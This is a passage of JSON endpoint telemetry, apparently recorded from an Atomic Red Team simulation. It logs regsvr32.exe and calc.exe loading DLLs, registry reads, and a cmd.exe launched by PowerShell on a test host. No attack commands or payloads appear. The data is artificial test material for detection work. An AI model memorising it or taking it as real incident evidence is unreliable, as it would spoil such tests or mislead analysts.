"regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573242300000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" - }, - { - "event_type": "image_load", - "image_name": "apphelp.dll", - "image_path": "C:\\Windows\\System32\\apphelp.dll", - "pid": 7428, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573242300000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" - }, - { - "event_type": "image_load", - "image_name": "AcLayers.dll", - "image_path": "C:\\Windows\\System32\\AcLayers.dll", - "pid": 7428, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573242300000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7428, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573242300000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 7428, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573242300000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" - }, - { - "event_type": "image_load", - "image_name": "win32u.dll", - "image_path": "C:\\Windows\\System32\\win32u.dll", - "pid": 7428, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573242300000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\System32\\gdi32.dll", - "pid": 7428, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - 
"timestamp": 131883573242300000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": "C:\\Windows\\System32\\gdi32full.dll", - "pid": 7428, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573242300000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp_win.dll", - "pid": 7428, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573242300000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 7428, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573242300000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" - }, - { - "event_type": "image_load", - "image_name": "shlwapi.dll", - "image_path": "C:\\Windows\\System32\\shlwapi.dll", - "pid": 7428, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573242300000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\System32\\combase.dll", - "pid": 7428, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573242300000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7428, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573242300000, - "unique_pid": 
"{42FC7E13-CBCC-5C05-0000-001066605401}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", - "pid": 7428, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573242300000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" - }, - { - "event_type": "image_load", - "image_name": "sfc.dll", - "image_path": "C:\\Windows\\System32\\sfc.dll", - "pid": 7428, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573242460000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" - }, - { - "event_type": "image_load", - "image_name": "winspool.drv", - "image_path": "C:\\Windows\\System32\\winspool.drv", - "pid": 7428, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573242460000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" - }, - { - "event_type": "image_load", - "image_name": "kernel.appcore.dll", - "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", - "pid": 7428, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573242460000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" - }, - { - "event_type": "image_load", - "image_name": "propsys.dll", - "image_path": "C:\\Windows\\System32\\propsys.dll", - "pid": 7428, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573242460000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" - }, - { - "event_type": "image_load", - "image_name": "oleaut32.dll", - "image_path": "C:\\Windows\\System32\\oleaut32.dll", - "pid": 7428, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573242460000, - "unique_pid": 
"{42FC7E13-CBCC-5C05-0000-001066605401}" - }, - { - "event_type": "image_load", - "image_name": "SHCore.dll", - "image_path": "C:\\Windows\\System32\\SHCore.dll", - "pid": 7428, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573242460000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 7428, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573242460000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7428, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573242460000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" - }, - { - "event_type": "image_load", - "image_name": "bcrypt.dll", - "image_path": "C:\\Windows\\System32\\bcrypt.dll", - "pid": 7428, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573242460000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" - }, - { - "event_type": "image_load", - "image_name": "sfc.dll", - "image_path": "C:\\Windows\\System32\\sfc.dll", - "pid": 7428, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573242460000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" - }, - { - "event_type": "image_load", - "image_name": "sfc_os.dll", - "image_path": "C:\\Windows\\System32\\sfc_os.dll", - "pid": 7428, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573242460000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" - }, - { - "event_type": "image_load", 
- "image_name": "imm32.dll", - "image_path": "C:\\Windows\\System32\\imm32.dll", - "pid": 7428, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573242460000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" - }, - { - "event_type": "image_load", - "image_name": "ole32.dll", - "image_path": "C:\\Windows\\System32\\ole32.dll", - "pid": 7428, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573242460000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" - }, - { - "event_type": "image_load", - "image_name": "uxtheme.dll", - "image_path": "C:\\Windows\\System32\\uxtheme.dll", - "pid": 7428, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573242460000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573242460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573242460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "regsvr32.exe", - 
"image_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573242300000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573242759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573242759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573242759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573242759984, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573242759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573242759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573242759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573242759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573242759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573242759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573242759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573242759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573242759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { 
- "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573242759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573242759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573242759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573242759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573242759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573242759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573242759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573242759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573242759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573242759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573242759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573242759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573242759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "netapi32.dll", - "image_path": "C:\\Windows\\System32\\netapi32.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 
131883573242759984, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "version.dll", - "image_path": "C:\\Windows\\System32\\version.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573242759984, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "winhttp.dll", - "image_path": "C:\\Windows\\System32\\winhttp.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573242759984, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "wkscli.dll", - "image_path": "C:\\Windows\\System32\\wkscli.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573242920000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "bcrypt.dll", - "image_path": "C:\\Windows\\System32\\bcrypt.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573242920000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "netutils.dll", - "image_path": "C:\\Windows\\System32\\netutils.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573242920000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "edputil.dll", - "image_path": "C:\\Windows\\System32\\edputil.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573243080000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - 
"image_name": "secur32.dll", - "image_path": "C:\\Windows\\System32\\secur32.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573243080000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "sspicli.dll", - "image_path": "C:\\Windows\\System32\\sspicli.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573243080000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "wininet.dll", - "image_path": "C:\\Windows\\System32\\wininet.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573243230000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "registry", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Content", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Content\\CachePrefix", - "registry_value": "CachePrefix", - "timestamp": 131883573243230000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "registry", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Cookies", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Cookies\\CachePrefix", - "registry_value": "CachePrefix", - 
"timestamp": 131883573243230000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "registry", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\History", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\History\\CachePrefix", - "registry_value": "CachePrefix", - "timestamp": 131883573243230000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c IF %%PROCESSOR_ARCHITECTURE%% ==AMD64 ELSE ", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 4664, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883573243260000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00108A675401}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "process", - "pid": 7428, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "subtype": "terminate", - "timestamp": 131883573243230000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4664, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573243230000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00108A675401}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": 
